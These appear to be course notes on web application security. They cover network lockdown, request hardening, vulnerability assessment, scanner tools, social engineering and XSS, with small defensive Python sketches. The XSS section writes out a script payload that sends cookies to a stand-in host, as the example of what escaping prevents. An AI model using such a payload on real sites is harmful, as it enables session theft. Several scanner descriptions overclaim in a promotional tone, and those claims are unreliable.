Service meshes introduce additional overheads to deploy, manage, and monitor the data plane
proxies and control plane components. For instance, you have to do the following:

 Ensure high availability and scalability of the service mesh infrastructure
 Monitor the health and performance of the proxies
 Handle upgrades and compatibility issues

It's essential to carefully design and configure the service mesh to minimize any performance
impact on the overall system.

Integration challenges

A service mesh must integrate seamlessly with existing infrastructure to perform its required functions. This includes container orchestration platforms, networking solutions, and other tools in the technology stack.

It can be challenging to ensure compatibility and smooth integration with other components in
complex and diverse environments. Ongoing planning and testing are required to change your
APIs, configuration formats, and dependencies. The same is true if you need to upgrade to new
versions anywhere in the stack.

Locking Down Network Connections


Locking down network connections is a critical aspect of securing computer systems and
preventing unauthorized access or malicious activities. This process involves implementing
various measures to control and restrict network communication. Here are key considerations
and practices for locking down network connections:

1. Firewalls:
 Definition: Firewalls are network security devices that monitor and control
incoming and outgoing network traffic based on predetermined security
rules.
 Implementation:
 Use both hardware and software firewalls.
 Configure firewalls to allow only necessary traffic and block all
other incoming and outgoing connections.
 Regularly review and update firewall rules.
2. Network Segmentation:
 Definition: Network segmentation involves dividing a network into isolated
segments to control the flow of traffic and limit the potential impact of a
security breach.
 Implementation:
 Implement VLANs (Virtual Local Area Networks) to segment traffic.
 Isolate critical infrastructure from less secure areas.
 Use separate subnets for different parts of the network.
3. Intrusion Detection and Prevention Systems (IDPS):
 Definition: IDPS monitors network or system activities for malicious
exploits or security policy violations.
 Implementation:
 Deploy IDPS to detect and respond to suspicious activities.
 Set up alerts and notifications for potential security incidents.
4. Access Control Lists (ACLs):
 Definition: ACLs are rules that specify which users or system processes
are granted access to objects, as well as what operations are allowed on
given objects.

 Implementation:
 Use ACLs to control access at the network level.
 Specify allowed and denied IP addresses, protocols, and ports.
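
The first-match-wins semantics of a typical ACL can be illustrated with a small sketch using Python's standard ipaddress module; the rules below are invented for illustration, with the implicit deny that most routers apply when no rule matches:

```python
import ipaddress

# (action, source network, destination port); evaluated top-down, first match wins.
RULES = [
    ("permit", ipaddress.ip_network("10.0.1.0/24"), 443),   # admin subnet -> HTTPS
    ("deny",   ipaddress.ip_network("10.0.0.0/8"),  None),  # rest of intranet
    ("permit", ipaddress.ip_network("0.0.0.0/0"),   80),    # anyone -> HTTP
]

def evaluate(src_ip: str, dst_port: int) -> str:
    src = ipaddress.ip_address(src_ip)
    for action, network, port in RULES:
        if src in network and (port is None or port == dst_port):
            return action
    return "deny"  # implicit deny at the end of every ACL

print(evaluate("10.0.1.7", 443))    # permit
print(evaluate("10.0.2.9", 443))    # deny
print(evaluate("203.0.113.5", 80))  # permit
```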
5. VPN (Virtual Private Network) Security:
 Definition: VPNs provide a secure way to connect to a private network over the internet.
 Implementation:
 Use strong encryption for VPN connections.
 Implement multi-factor authentication for VPN access.
 Regularly update and patch VPN software.
6. Port Security:
 Definition: Port security involves controlling access to physical network ports on switches.
 Implementation:
 Disable unused physical ports on network devices.
 Implement MAC address filtering to allow only authorized devices.
7. Network Access Control (NAC):
 Definition: NAC is a security approach that enforces policies to control access to networks.
 Implementation:
 Use NAC solutions to assess the security posture of devices before granting network access.
 Enforce compliance with security policies.
8. Secure Protocols:
 Definition: Use secure communication protocols to protect data in transit.
 Implementation:
 Use HTTPS instead of HTTP for web traffic.
 Avoid outdated and insecure protocols.
9. Monitoring and Logging:
 Definition: Regularly monitoring network traffic and maintaining logs helps
detect and respond to security incidents.
 Implementation:
 Implement network monitoring tools.
 Analyze logs for unusual patterns or suspicious activities.
10. Regular Updates and Patching:
 Definition: Keeping network devices and software up to date helps address
known vulnerabilities.
 Implementation:
 Establish a patch management process.
 Regularly update firmware, operating systems, and software.
11. Employee Training:
 Definition: Educate employees about security best practices and the
importance
of adhering to network security policies.
 Implementation:
 Conduct regular security awareness training.
 Emphasize the risks of unauthorized access and social
engineering attacks.
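
To make the ACL idea concrete, here is a minimal sketch in Python (standard library only; the networks, ports, and function name are hypothetical illustrations, not any product's API). It checks a connection's source address and destination port against an allow list, which is the same allow-or-deny decision a router or firewall ACL makes:

    import ipaddress

    # Hypothetical ACL: allowed source networks and destination ports.
    ALLOWED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"),
                        ipaddress.ip_network("192.168.1.0/24")]
    ALLOWED_PORTS = {22, 443}

    def acl_permits(source_ip: str, dest_port: int) -> bool:
        # Permit only traffic from an allowed network to an allowed port.
        addr = ipaddress.ip_address(source_ip)
        in_allowed_network = any(addr in net for net in ALLOWED_NETWORKS)
        return in_allowed_network and dest_port in ALLOWED_PORTS

    print(acl_permits("10.1.2.3", 22))     # True: internal host, allowed port
    print(acl_permits("203.0.113.9", 80))  # False: external host, blocked port

In practice such rules are enforced by routers, switches, and firewalls rather than by application code, but the underlying logic is the same.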
By implementing these measures, organizations can significantly enhance the security of
their network connections and reduce the risk of unauthorized access, data breaches, and
other security incidents. Regular security assessments and audits are also essential to ensure
ongoing network security.
Definition: Locking down network connections refers to the implementation of
security measures and access controls to restrict and control the flow of data between
devices on a network. This practice aims to enhance the security of networked systems by
preventing unauthorized access, minimizing attack surfaces, and protecting sensitive
information from unauthorized interception or manipulation.

Explanation: Securing network connections involves implementing a combination of
technological, procedural, and policy-based controls to ensure that only authorized entities
have access to specific resources and services within a network. This can include measures
such as firewalls, access control lists (ACLs), network segmentation, and encryption to
safeguard the confidentiality, integrity, and availability of data.

Types of Locking Down Network Connections:

1. Firewall Rules:
 Configuring rules within firewalls to control traffic based on source,
destination, port, and protocol.
2. Access Control Lists (ACLs):
 Implementing ACLs on routers and switches to control access to
network resources based on IP addresses and other criteria.
3. Network Segmentation:
 Dividing the network into segments or VLANs to limit communication
between different parts of the infrastructure.
4. Intrusion Prevention Systems (IPS):
 Deploying systems that actively monitor network traffic to detect and
prevent malicious activities.
5. Virtual Private Networks (VPNs):
 Establishing secure, encrypted communication channels for remote
access or communication between geographically distributed networks.
6. Port Security:
 Controlling physical access to network ports on switches to prevent
unauthorized devices from connecting.
7. Network Access Control (NAC):
 Enforcing security policies to control and manage devices attempting to
connect to the network.

Characteristics of Locking Down Network Connections:

1. Granular Control:



 Provides fine-grained control over who can access specific network
resources and services.
2. Layered Defense:
 Utilizes multiple layers of security measures to create a robust defense
against various threats.
3. Adaptability:
 Can be adapted to the specific needs and requirements of different
organizations and network architectures.

Advantages:

1. Security Enhancement:
 Enhances overall network security by restricting unauthorized access.
2. Risk Reduction:
 Reduces the risk of data breaches, unauthorized intrusions, and other
security incidents.
3. Compliance:
 Helps organizations comply with industry regulations and data
protection standards.
4. Control Over Traffic:
 Provides administrators with control over the flow of network traffic,
allowing for better management.

Disadvantages:

1. Complexity:
 Implementing and managing robust network security measures can
introduce complexity.
2. Operational Overhead:
 Requires ongoing monitoring, maintenance, and updates, adding to
operational overhead.

Needs for Locking Down Network Connections:

1. Protection Against Unauthorized Access:


 To prevent unauthorized individuals or entities from accessing sensitive
network resources.
2. Data Confidentiality:
 To protect sensitive data from interception or unauthorized viewing.
3. Regulatory Compliance:
 To comply with industry-specific regulations and data protection laws.
4. Preservation of Network Integrity:



 To ensure the integrity and reliability of networked systems and
services.

Uses:

1. Enterprise Networks:
 Locking down network connections is crucial for securing internal
corporate networks.
2. Cloud Environments:
 Essential for securing communication between services and resources in
cloud-based infrastructures.
3. Critical Infrastructure:
 Protects communication networks in critical infrastructure sectors such
as energy, transportation, and healthcare.
4. E-commerce and Financial Services:
 Critical for securing online transactions and financial data.

In summary, locking down network connections is a fundamental practice in cybersecurity,
aiming to create a secure and controlled network environment. It involves a combination of
technical controls, policies, and ongoing monitoring to mitigate risks and protect sensitive
information.

Securing Incoming Requests
Definition: Securing incoming requests refers to the process of implementing
measures to protect web applications or services from potential security threats posed by data
sent from external sources. This includes validating and filtering incoming data to ensure
that it meets specific security criteria, preventing common vulnerabilities and unauthorized
access attempts.

Explanation: Securing incoming requests is crucial for maintaining the integrity and
confidentiality of web applications. It involves implementing a variety of security
mechanisms and best practices to validate and sanitize user input, authenticate and authorize
users, encrypt data in transit, and protect against various types of attacks such as SQL
injection, cross-site scripting (XSS), and more.

Types of Mechanisms for Securing Incoming Requests:

1. Input Validation:
 Checking and validating user input to ensure it adheres to expected
formats and does not contain malicious code (a combined sketch of items 1, 5, and 9 appears after this list).
2. Authentication:



 Verifying the identity of users before granting access to protected
resources.
3. Authorization:
 Controlling and granting access to specific functionalities or resources based
on the user's privileges.
4. Encryption:
 Securing data in transit by using encryption protocols such as HTTPS to
prevent eavesdropping and data tampering.
5. Rate Limiting:
 Restricting the number of requests a user or IP address can make within a
defined time period to prevent abuse and denial-of-service attacks.
6. Web Application Firewall (WAF):
 Implementing a firewall designed specifically for web applications to filter
and block malicious traffic.
7. Content Security Policy (CSP):
 Defining and enforcing policies to control the sources from which
certain types of content can be loaded.
8. Cross-Origin Resource Sharing (CORS):
 Regulating which domains are permitted to make requests to a web
application.
9. Security Headers:
 Setting HTTP headers to enhance security, including headers like HTTP
Strict Transport Security (HSTS) and X-Content-Type-Options.
10. File Upload Security:
 Validating and securing file uploads to prevent malicious files or
content from being processed.
11. Session Management:
 Safeguarding user sessions through secure session identifiers, session
timeouts, and secure cookie attributes.
12. Monitoring and Logging:
 Implementing robust monitoring and logging mechanisms to detect and
respond to security incidents.
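
As a concrete illustration of input validation, rate limiting, and security headers working together, here is a minimal sketch in Python (standard library only; all names, the whitelist pattern, and the limits are hypothetical choices, not a framework's API). A production system would use a web framework, a WAF, and a shared store such as Redis for the counters:

    import re
    import time

    USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")  # whitelist of expected input
    RATE_LIMIT = 100        # max requests per client per window
    WINDOW_SECONDS = 60
    _request_counts = {}    # client IP -> (window start time, request count)

    def validate_username(value: str) -> bool:
        # Input validation: accept only the characters and length we expect.
        return bool(USERNAME_RE.match(value))

    def allow_request(client_ip: str) -> bool:
        # Fixed-window rate limiting: reset the counter when a new window
        # starts, refuse the request once the per-window limit is reached.
        now = time.time()
        start, count = _request_counts.get(client_ip, (now, 0))
        if now - start >= WINDOW_SECONDS:
            start, count = now, 0
        if count >= RATE_LIMIT:
            return False
        _request_counts[client_ip] = (start, count + 1)
        return True

    def security_headers() -> dict:
        # Response headers that harden the application in the browser.
        return {
            "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
            "Content-Security-Policy": "default-src 'self'",
            "X-Content-Type-Options": "nosniff",
        }

A request handler would typically reject the request with HTTP 400 when validation fails, respond with HTTP 429 when allow_request returns False, and attach security_headers() to every response.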

Characteristics:

1. Proactive Defense:
 Involves implementing measures to proactively defend against
potential security threats rather than reacting to incidents.
2. Layered Security:
 Typically involves the implementation of multiple security layers to
create a comprehensive defense strategy.
3. Continuous Improvement:
 Requires continuous monitoring and updates to adapt to emerging
security threats.

Advantages:



1. Prevention of Attacks:
 Effectively prevents common web application attacks, such as SQL
injection, XSS, and CSRF.
2. Data Integrity:
 Ensures the integrity of data by preventing unauthorized modifications
or tampering.
3. User Privacy:
 Protects user privacy by securing sensitive information from
unauthorized access.
4. Regulatory Compliance:
 Helps in meeting regulatory requirements related to data protection and
user privacy.

Disadvantages:

1. Complexity:
 Implementing and managing a comprehensive security strategy can
introduce complexity.
2. Performance Impact:
 Some security mechanisms, such as encryption, may introduce a
performance overhead.

Uses:

1. Web Applications:
 Essential for securing web applications, particularly those dealing with
sensitive data or user accounts.
2. APIs (Application Programming Interfaces):
 Critical for securing APIs to prevent unauthorized access and data
breaches.
3. Online Services:
 Used in online services, including e-commerce platforms, banking
websites, and social media networks.
4. Cloud Environments:
 Important for securing applications and services hosted in cloud
environments.
5. Critical Infrastructure:
 Deployed in critical infrastructure systems to protect against cyber
threats.

In summary, securing incoming requests is fundamental to maintaining the security
and trustworthiness of web applications and services. It involves a combination of
preventive measures, monitoring, and continuous improvement to stay ahead of
evolving security threats.



UNIT IV VULNERABILITY ASSESSMENT AND
PENETRATION TESTING
Vulnerability Assessment Lifecycle:
As stated in the introduction, risk and vulnerability assessments are vital
building blocks in your integrated risk management program. Let's make clear
how these two concepts are linked.
Vulnerability assessment, or vulnerability analysis, is a series of activities a
company should perform regularly to identify, quantify, and prioritize risks
and vulnerabilities in order to keep its information security posture effective.
Risk assessment identifies recognized threats, threat actors, and the probability
that these factors will result in an exposure or loss. In simple words, risk
assessment is the process of looking for the bad things that can happen, who can
cause them, and what their impact would be on important pieces of the
company's information if they materialize.
Vulnerability and risk assessments represent, respectively, step 2 and step 3 in
the vulnerability management life cycle.
The vulnerability management life cycle starts by defining the effectiveness of the
current security policies and procedures. If a company has already set up an
information security management system, it is important to establish any risks
that may be associated with the implementation of current security procedures
and what may have been overlooked.

Try to see what the organization looks like from an outsider’s perspective, as
well as from an insider’s standpoint. Work with management to set goals with
start dates and end dates. Determine which systems to begin with, set up
testing standards, get approval in writing, and keep management
informed on the progress: what you are doing, how you will do it, and the
timing for each phase of the project. The following steps describe the
vulnerability management life cycle that security professionals use to find and
remediate security weakness before any attack and/ or implement security
controls
Creating Baseline
In this phase, the following activities take place: defining the effectiveness of the
current security measures and procedures, ensuring that nothing in the scope
of the information security management system is overlooked, working with
management to set goals with a timeframe to complete them, and getting
written approval prior to beginning any assessment activity.
Vulnerability Assessment
In this phase, a vulnerability scan will be performed to identify vulnerabilities in
the OS, web application, webserver, and other services. This phase helps
identify the category and criticality of the vulnerability and minimizes the level
of risk. This is the step where penetration testing begins.
Risk Assessment
In this phase, risks are identified, characterized, and classified with risk control
techniques. Vulnerabilities are categorized based on impact level (such as Low,
Medium, or High). This is where you present reports that identify the
problems and the risk treatment plan to protect the information.
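
As a simple illustration of this classification step, here is a small sketch in Python (the findings, scores, and thresholds are hypothetical; the three-bucket mapping is a simplification of the CVSS v3 severity ranges) that orders scan results so the highest-impact items are treated first:

    # Hypothetical scan findings: (description, CVSS base score)
    findings = [("Outdated TLS version", 5.3),
                ("SQL injection in login form", 9.8),
                ("Verbose server banner", 2.1)]

    def impact_level(cvss: float) -> str:
        # Map a CVSS base score to the impact buckets used in this phase.
        if cvss >= 7.0:
            return "High"
        if cvss >= 4.0:
            return "Medium"
        return "Low"

    # Print the risk report ordered from most to least severe.
    for name, score in sorted(findings, key=lambda f: f[1], reverse=True):
        print(f"{impact_level(score):6} {score:4.1f} {name}")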
Remediation
Remediation refers to performing the steps used to mitigate the identified
vulnerabilities according to their impact level. In this phase, the response team
designs mitigation processes to cover the vulnerabilities.
Verification
This phase helps verify whether all the previous phases were properly
employed. It is also where the verification of remedies is performed.

Vulnerability assessment tools are categorized based on the type of system
they scan and can provide a detailed look into various
vulnerabilities. These automated scans help organizations
continuously monitor their networks and ensure their
environment complies with industry and government regulations.

Hacker-powered testing uses a combination of automated and
manual techniques to scan applications more thoroughly. Ethical
hackers are security experts who help organizations discover and
remediate vulnerabilities before bad actors exploit them. These
hackers use their expertise to find bugs and critical vulnerabilities
missed by automated scans. Let’s look at a few different types of
vulnerability scanning tools used during an assessment.

Network-based scanners identify vulnerabilities on both wired
and wireless networks, and they include features such as network
mapping, protocol analysis, and traffic capture. Network-based
scanners map out a network in the early stages of a vulnerability
assessment and identify vulnerabilities in services, open ports,
and network infrastructure.
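
A minimal example of the port-discovery step that such scanners automate, written in Python with only the standard library (the target address and port list are placeholders; scan only systems you are authorized to test):

    import socket

    TARGET = "192.0.2.10"            # placeholder address from the TEST-NET range
    PORTS = [22, 80, 443, 3306]      # a few common service ports

    for port in PORTS:
        # connect_ex returns 0 when the TCP handshake succeeds (port open).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1.0)
            state = "open" if s.connect_ex((TARGET, port)) == 0 else "closed/filtered"
            print(f"{TARGET}:{port} is {state}")

Full scanners such as Nmap add service fingerprinting, timing controls, and stealth techniques on top of this basic probe.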

Host-based vulnerability scanners focus on identifying network
weaknesses in different host machines, such as servers or
workstations. These scanners identify misconfigurations,
unpatched systems, and improper permission settings.

Database vulnerability scanners find weaknesses in database
systems and development environments. These scanners discover
vulnerabilities in database architecture and identify areas where
attackers could inject malicious code to obtain information
without permission.

Many of the available vulnerability assessment tools are free and
open-source, and they offer integration with other security suites
or Security Information and Event Management (SIEM) systems. Let's
look at a few of the available tools.

Burp Suite offers automated vulnerability scanning tools for
internal and external testing. Over 14,000 organizations actively
use Burp Suite to automate web vulnerability scanning.

Pros

 A large and active community

 Simple interface and user-friendly design

 Supports automated scanning and simulated threat scenarios

Cons

 The community (free) edition provides limited features compared
to the enterprise edition

Nessus is software that offers in-depth vulnerability scanning
through a subscription-based service. Hackers use Nessus to
identify misconfigurations, discover default credentials, and find
known vulnerabilities across a wide range of systems.
Intruder.io provides a combination of penetration testing and
vulnerability scanning tools. Organizations can use Intruder.io to
run single assessments or continuously monitor their
environments for threats.

Pros

 Easy to configure

 Responsive support

Cons

 Offers little in-depth reporting

Web Application Attack and Audit Framework, or w3af, is a free,
open-source framework that discovers vulnerabilities and helps
ethical hackers exploit them on the application layer. The
framework is written entirely in Python and is one of the easier
vulnerability tools to use, thanks to its intuitive interface.

Pros

 Free

 Simple installation in Linux® environments

Cons

 Offers less support than paid tools

 Windows® version might be difficult to install

One of the more popular open-source network scanning tools,
Network Mapper (Nmap) is a staple among new and experienced
hackers. Nmap uses multiple probing and scanning techniques to
discover hosts and services on a target network.

Pros

 Free

 Includes stealth scanning methods to avoid IDS

 Offers GUI functionality through Zenmap

Cons

 Is not updated as frequently as paid tools

OpenSCAP is another open-source framework providing
cybersecurity tools for Linux platforms. OpenSCAP offers an
extensive suite of tools that support scanning on web
applications, network infrastructure, databases, and host
machines.

Pros

 Focuses on automating assessments

 Free and open-source

Cons

 Steeper learning curve than similar tools

When developers deploy a patch, they’ll have the option to
request a retest. Retesting is a manual process where the hacker
will attempt to find the same vulnerability post-patching. Retests
are a quick way for developers to receive validation that their
patch is working as intended.

HackerOne Assessments provide on-demand, continuous security
testing for your organization, including capabilities for AWS
customers such as AWS Certified hackers, HackerOne
Assessments: Application for Pentest, and AWS Security Hub. The
platform allows you to track progress through the kickoff,
discovery, testing, retesting, and remediation phases of an
engagement. Whether you're looking to meet regulatory
standards, launch a product, or prove compliance, it helps
security teams find and close flaws before cybercriminals exploit
them.

HackerOne delivers access to the world's largest and most diverse
community of hackers. Organizations can contact HackerOne to learn
how to start leveraging hacker-powered security.
Vulnerability Assessment (VA) tools are essential for identifying and managing
security vulnerabilities in computer systems, networks, and applications. These tools
help organizations proactively identify weaknesses in their IT infrastructure before
malicious actors can exploit them. Here are some popular Vulnerability Assessment
tools:

1. Nessus:
 Nessus is one of the most widely used vulnerability assessment tools. It
scans networks for vulnerabilities and provides detailed reports. It
supports various platforms and offers both free and commercial
versions.
2. OpenVAS (Open Vulnerability Assessment System):
 OpenVAS is an open-source vulnerability scanner that is part of the
Greenbone Security Manager (GSM) solution. It's designed to detect
vulnerabilities in networks and applications.

3. Qualys:
 Qualys is a cloud-based security and compliance management
platform. It provides a suite of tools for vulnerability management,
including vulnerability scanning, policy compliance, and web
application scanning.
4. Nexpose (Rapid7 InsightVM):
 Nexpose, now part of Rapid7's InsightVM, is a vulnerability
management solution that helps organizations prioritize and remediate
security risks. It offers advanced scanning capabilities and reporting.
5. Acunetix:
 Acunetix is a web application security scanner that helps identify
vulnerabilities in web applications. It checks for common web
vulnerabilities such as SQL injection, cross-site scripting (XSS), and
more.
6. Burp Suite:
 Burp Suite is primarily known as a web application security testing tool,
but it also includes features for general security testing. It's widely used
for manual and automated testing of web applications.
7. Retina (BeyondTrust):
 Retina is a vulnerability management tool that provides comprehensive
scanning and assessment of network vulnerabilities. It helps
organizations prioritize and remediate security issues.
8. IBM Security AppScan:
 IBM Security AppScan is designed for testing web applications and
mobile applications for security vulnerabilities. It offers dynamic
analysis (DAST) and static analysis (SAST) capabilities.
9. OWASP ZAP (Zed Attack Proxy):
 ZAP is an open-source security testing tool for finding vulnerabilities in
web applications. It's maintained by the Open Web Application Security
Project (OWASP) and is often used for manual and automated security
testing.
10. Tenable.io:
 Tenable.io is a cloud-based vulnerability management platform that
provides vulnerability scanning, assessment, and reporting capabilities.
It offers a centralized view of an organization's security posture.

Scanning for cloud-based vulnerabilities is an essential cybersecurity practice in the
tech world. Cloud vulnerability scanners typically support activities such as:
 Scanning systems and networks for security vulnerabilities
 Performing ad-hoc security tests whenever they are needed
 Tracking, diagnosing, and remediating cloud vulnerabilities
 Identifying and resolving wrong configurations in networks

Here are the top 5 vulnerability scanners for cloud security:

Intruder Cloud Security


Intruder is a Cloud Vulnerability Scanning Tool specially designed for scanning AWS,
Azure, and Google Cloud. This is a highly proactive cloud-based vulnerability scanner
that detects every form of cybersecurity weakness in digital infrastructures.

Intruder is highly efficient because it finds cybersecurity weaknesses in exposed
systems before they can lead to costly data breaches.

The strength of this vulnerability scanner for cloud-based systems is in its perimeter
scanning abilities. It is designed to discover new vulnerabilities to ensure the
perimeter can’t be easily breached or hacked. In addition, it adopts a streamlined
approach to bugs and risk detection.

Hackers will find it very difficult to breach a network if an Intruder Cloud Security
Scanner is used. It will detect all the weaknesses in a cloud network to help
prevent hackers from finding those weaknesses.

Intruder also offers a unique threat interpretation system that makes identifying and
managing vulnerabilities straightforward. It is a highly recommended tool.

Aqua Cloud Security


Aqua Cloud Security is a vulnerability scanner designed for scanning, monitoring, and
remediating configuration issues in public cloud accounts according to best practices
and compliance standards across cloud-based platforms such as AWS, Azure, Oracle
Cloud, and Google Cloud.

It offers a complete Cloud-Native Application Protection Platform covering threat
analysis, Kubernetes security, serverless security, container security, virtual machine
security, and cloud-based platform integrations.

Aqua Cloud Security Scanner offers users different CSPM editions that
include SaaS and Open-Source Security. It helps secure the configuration of
individual public cloud services with CloudSploit and performs comprehensive
solutions for multi-cloud security posture management.

Mistakes are almost inevitable within a complex cloud environment, and if not
adequately checked, it could lead to misconfiguration that can escalate to serious
security issues.

Hence, Aqua Cloud Security devised a comprehensive approach to prevent data
breaches.

Qualys Cloud Security


Qualys Cloud Security is an excellent cloud computing platform designed to identify,
classify, and monitor cloud vulnerabilities while ensuring compliance with internal
and external policies.

This vulnerability scanner prioritizes scanning and remediation by automatically
finding and eradicating malware infections on web applications and system websites.

Qualys provides public cloud integrations that allow users to have total visibility of
public cloud deployments.

Most public cloud platforms operate on a “shared security responsibility” model,
which means users are expected to protect their workload in the cloud. This can be a
daunting task if done manually, so most users will rather employ vulnerability
scanners.

Qualys provides complete visibility with end-to-end IT security and compliance with
hybrid IT and AWS deployments. It continuously monitors and assesses AWS assets
and resources for security issues, misconfigurations, and non-standard deployments.

It is the perfect vulnerability scanner for scanning cloud environments and detecting
vulnerabilities in complex internal networks.

It has a central single-pane-of-glass interface and CloudView dashboard that allows
users to view monitored web apps and all AWS assets across multiple accounts
through a centralized UI.

Rapid7 Insight Cloud Security


Rapid7 InsightCloudSec platform is one of the best vulnerability scanners for cloud
security. This vulnerability scanner is designed to keep cloud services secure.

It features an insight platform that provides web application security, vulnerability
management, threat command, and bug detection and response, along with expert
cloud security management and consulting services.

The secure cloud services provided by Rapid7 InsightCloudSec help to drive the
business forward in the best possible ways. It also enables users to drive innovation
through continuous security and compliance.

CrowdStrike Falcon Cloud Security
This vulnerability scanner will create less work for cloud security and DevOps teams
because cloud deployments are automatically optimized with unified protection.

Its features include automated cloud vulnerability discovery, detecting and
preventing threats, and continuous runtime protection, including EDR for cloud
workloads and containers.

Furthermore, it allows web developers to build and run web applications knowing
they are fully protected from a data breach. As a result, when threats are hunted and
eradicated, cloud applications will run smoothly and faster while working with the
utmost efficiency.

Conclusion

Vulnerability scanners are essential for cloud security because they can easily detect
system weaknesses and prioritize effective fixes. This will help reduce the workload
on security teams in organizations. Each of the vulnerability scanners reviewed in this
guide offers excellent benefits.

These vulnerability scanners allow users to perform scans by logging into the website
as authorized users. When this happens, it automatically monitors and scans areas of
weakness in the systems.

It also identifies anomalies in network packet configuration to block hackers from
exploiting system programs. Automated vulnerability assessment is crucial for cloud
security services.

So, vulnerability scanners can detect thousands of vulnerabilities and identify the
actual risk of these vulnerabilities by validating them.

Once these have been achieved, they then prioritize remediation based on the risk
level of these vulnerabilities. All five vulnerability scanners reviewed are tested and
trusted, so users do not need to worry about any form of deficiency.

Finally, it is essential to note that vulnerability scanning is different from penetration
testing.

Vulnerability scanners discover vulnerabilities and classify them based on their threat
level. They correlate them with software, devices, and operating systems that are
connected to a cloud-based network. Misconfigurations are also detected on the
network.

However, penetration testing deploys a different method that involves exploiting the
detected vulnerabilities on a cloud-based network. So, penetration testing is carried
out immediately after vulnerability scanning has been done.

Both cloud security processes are similar and focused on ensuring web applications
and networks are safe and protected from threats.

Cloud-based vulnerability scanners offer the advantage of scalability, flexibility, and
ease of management, as they are hosted and maintained in the cloud. These tools
are particularly well-suited for organizations that operate in cloud environments or
have a distributed infrastructure. Here are some popular cloud-based vulnerability
scanners:

1. Tenable.io:
 Tenable.io, the cloud version of Tenable's Nessus, provides vulnerability
scanning, assessment, and management capabilities. It offers features
like asset discovery, prioritization, and integration with other security
tools.
2. Qualys Cloud Platform:
 Qualys is known for its cloud-based security and compliance platform.
The Qualys Cloud Platform includes various modules for vulnerability
management, policy compliance, and web application scanning.
3. Rapid7 InsightVM:
 Rapid7's InsightVM is a cloud-based vulnerability management solution
that helps organizations identify and remediate security risks. It
provides real-time visibility into the security posture of your assets.
4. Acunetix (Acunetix 360):
 Acunetix offers a cloud-based version, Acunetix 360, which is designed
for web application security testing. It includes features such as
automated scanning, vulnerability assessment, and integration with
CI/CD pipelines.
5. Detectify:
 Detectify is a cloud-based web application security scanner that focuses
on detecting vulnerabilities in web applications. It offers continuous
monitoring and integrates well with development workflows.
6. CloudMapper:
 CloudMapper is an open-source tool developed by Duo Security (now
part of Cisco) for visualizing and assessing the security of Amazon Web
Services (AWS) environments. It helps identify potential
misconfigurations and security issues.
7. AWS Inspector:
 AWS Inspector is a security assessment service provided by Amazon
Web Services. It automatically assesses applications for vulnerabilities
and deviations from security best practices.
UNIT V

HACKING TECHNIQUES AND TOOLS

SOCIAL ENGINEERING

Social engineering adds a human element to the attacker's toolkit in web application security.
While vulnerability assessments and scanners target technical weaknesses, social engineering
exploits human psychology to manipulate users into compromising the security of web
applications.

How social engineering attacks unfold:

Target Selection: Attackers often target specific individuals within an organization who have
access to sensitive data or systems related to the web application. They might gather information
about these individuals through social media, professional networking sites, or even phishing
attempts.

Deception Tactics: Once a target is identified, attackers employ various deception tactics to trick
them into divulging sensitive information or performing actions that compromise security. Some
common tactics include:

• Phishing Emails: These emails appear to be from legitimate sources (e.g., IT
department, bank) and often create a sense of urgency or fear to pressure the victim into
clicking malicious links or attachments that can steal credentials or install malware.
• Pretexting: Attackers fabricate a scenario (e.g., posing as a customer service
representative) to gain the victim's trust and then trick them into revealing sensitive
information or granting access to systems.



• Quid Pro Quo: Attackers offer something in exchange for the victim's cooperation,
such as fake technical support or promises of unlocking features within the web
application.

Bypassing Security Controls: Successful social engineering attacks can bypass technical security
controls put in place to protect web applications. If an attacker tricks a user into revealing their
login credentials, they can access the web application directly, bypassing firewalls or
authentication mechanisms.

Impact on Web Application Security:

• Data Breaches: Social engineering attacks can lead to data breaches if attackers gain
access to user accounts or databases containing sensitive information.
• Account Takeover: Attackers can use stolen credentials to take over user accounts within
the web application, potentially causing financial damage or reputational harm.
• Malware Installation: Social engineering tactics can be used to trick users into installing
malware on their devices, which can then be used to steal data, launch further attacks, or
disrupt operations.

Protecting Against Social Engineering:

• Security Awareness Training: Educating employees about social engineering tactics and
best practices for identifying and avoiding them is crucial.
• Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of
security, making it more difficult for attackers to access accounts even if they steal
login credentials.
• Phishing Simulations: Conducting regular phishing simulations can help employees
identify suspicious emails and avoid falling victim to them.



• Least Privilege Access: Limiting user access to only the systems and data they need
for their job functions can minimize the damage caused by a successful social
engineering attack.

CROSS-SITE SCRIPTING (XSS):

Definition:

Cross-Site Scripting (XSS) is a type of web security vulnerability that allows attackers to inject
malicious scripts into otherwise trusted websites or web applications. These scripts are then
executed by the victim's browser, potentially compromising their session, stealing data, or
redirecting them to malicious websites.

How XSS Works:

1. Attacker injects malicious script: The attacker injects malicious code, often in the form
of JavaScript, into a vulnerable field on a web application. This could be a search bar, a
comment section, or even a user profile.
2. Victim unknowingly interacts: The victim unknowingly interacts with the application,
causing the malicious script to be sent to their browser.
3. Browser executes the script: The victim's browser treats the malicious script as
legitimate code and executes it within the context of the web application.
4. Attacker gains control: The malicious script can then perform various actions on the
victim's browser, such as stealing cookies (session data), logging keystrokes, or
redirecting the user to a phishing site.
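
The root cause in each of these steps is that untrusted input reaches the page without encoding. Here is a minimal sketch in Python (the comment value and variable names are hypothetical) showing how output encoding with the standard library's html.escape renders an injected script inert:

    import html

    # Untrusted input submitted through a comment form.
    comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

    # Vulnerable: the input is concatenated into the page as-is,
    # so the victim's browser executes the injected script.
    unsafe_html = "<div class='comment'>" + comment + "</div>"

    # Safer: HTML-encode the input so the browser displays it as text.
    safe_html = "<div class='comment'>" + html.escape(comment) + "</div>"

    print(safe_html)  # &lt;script&gt;... is shown literally instead of executing

Web frameworks apply this encoding automatically through their template engines, which is why bypassing or disabling auto-escaping is a common source of XSS.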

Types of XSS:



• Reflected XSS: The malicious script is reflected back to the victim's browser
immediately after it's submitted. This is the most common type of XSS.
• Stored XSS: The malicious script is permanently stored on the web server and is delivered
to any user who views the affected page.
• DOM-based XSS: The malicious script manipulates the Document Object Model (DOM)
of the web page without being stored on the server.

XSS Detection and Prevention Tools:

• Web Application Scanners: These tools can automatically scan web applications for
vulnerabilities like XSS. Popular options include Acunetix, Netsparker, and Burp
Suite.
• Security Code Analysis Tools: These tools can analyze source code for potential security
vulnerabilities, including XSS. Examples include SAST (Static Application Security
Testing) tools like Fortify and CodeSonar.
